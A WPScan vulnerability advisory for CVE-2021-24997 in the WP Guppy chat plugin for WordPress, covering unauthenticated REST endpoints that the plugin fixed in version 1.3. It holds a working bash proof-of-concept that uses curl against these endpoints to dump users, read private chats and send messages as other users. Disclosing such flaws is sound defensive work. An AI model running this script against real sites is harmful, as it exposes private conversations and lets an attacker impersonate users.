WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WP Guppy < 1.3 - Sensitive Information Disclosure

Description

The plugin does not have any authorisation in some of the REST API endpoints, allowing any user to call them and could lead to sensitive information disclosure, such as usernames and chats between users, as well as be able to send messages as an arbitrary user

Proof of Concept

#!/bin/bash
#Exploit Title: Wordpress Plugin WP Guppy A live chat - WP-JSON API Sensitive Information Disclosure
#Exploit Author: Keyvan Hardani
#Date: 22/11/2021
#Vendor Homepage: https://wp-guppy.com/
#Version: up to 1.1
#Tested on: Kali Linux - Windows 10 - Wordpress 5.8.x and apache2
#Usage ./exploit.sh -h

Help()
{
   # Display Help
   echo "Usage"
   echo
   echo "Wordpress Plugin WP Guppy - A live chat - WP_JSON API Sensitive Information Disclosure"
   echo
   echo "Option 1: Get all users ( ./exploit.sh 1 domain.com)"
   echo "Option 2: Send message from / to other users ( ./exploit.sh 2 domain.com 1493 1507 ) => Senderid=1493 & Receiverid=1507" 
   echo "Option 3: Get the chats between users ( ./exploit.sh 3 domain.com 1507 1493) => Receiverid=1493 & Userid= 1493" 
   echo "-h  Print this Help."
   echo
}

while getopts ":h" option; do
   case $option in
      h) # display Help
         Help
         exit;;
   esac
done

if [ $1 == 1 ]
	then
	curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=" | python -m json.tool
fi

if [ $1 == 2 ]
	then
	curl -s -X POST --url "https://$2/wp-json/guppy/v2/send-guppy-message" --data '{"receiverId":"'$3'","userId":"'$4'","guppyGroupId":"","chatType":1,"message":"test","replyTo":"","latitude":"","longitude":"","messageType":0,"messageStatus":0,"replyId":"","timeStamp":1637583213,"messageSentTime":"November 22, 2021","metaData":{"randNum":5394},"isSender":true}' -H 'Content-Type: application/json'| python -m json.tool
fi
if [ $1 == 3 ]
	then
	curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-user-chat?offset=0&receiverId=$3&userId=$4&chatType=1" | python -m json.tool
fi
 

Affects Plugins

wp-guppy
Fixed in version 1.3

References

CVE
CVE-2021-24997
URL
https://github.com/Keyvanhardani/WP-Guppy-A-live-chat-WP-JSON-API-Sensitive-Information-Disclosure
ExploitDB
50540

YouTube Video

Classification

Type

NO AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher

Keyvan Hardani

Submitter

Keyvan Hardani

Submitter website
http://hardani.de
Verified

Yes

WPVDB ID
747e6c7e-a167-4d82-b6e6-9e8613f0e900

Timeline

Publicly Published

2021-11-22 (about 1 years ago)

Added

2021-11-23 (about 1 years ago)

Last Updated

2022-04-09 (about 9 months ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceSubmission termsDisclosure policyPrivacy Notice for California Users
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us